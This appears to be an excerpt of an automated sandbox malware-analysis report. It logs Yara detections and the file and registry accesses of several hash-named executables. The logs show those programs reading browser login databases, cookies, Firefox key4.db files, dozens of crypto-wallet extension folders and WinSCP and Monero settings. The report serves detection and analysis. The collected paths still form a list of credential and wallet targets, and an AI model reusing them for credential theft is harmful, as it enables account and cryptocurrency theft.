                      Source: Yara match File source: 00000000.00000003.1724316181.0000000004690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000005.00000003.2303212460.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: 9d4ddc637a.exe PID: 5600, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: 77594b3442.exe PID: 7456, type: MEMORYSTR
                      Source: Yara match File source: 00000038.00000003.2987064495.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: 513dad5c05.exe PID: 7432, type: MEMORYSTR
                      Source: Yara match File source: 43.0.7d28d37061cb43098969a37cf25a380a.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0000000F.00000002.2742198429.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000F.00000002.2742198429.0000000003CBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: 4268204ace.exe PID: 7312, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: 7d28d37061cb43098969a37cf25a380a.exe PID: 5916, type: MEMORYSTR
                      Source: Yara match File source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe, type: DROPPED
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.db
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.db
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.db
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
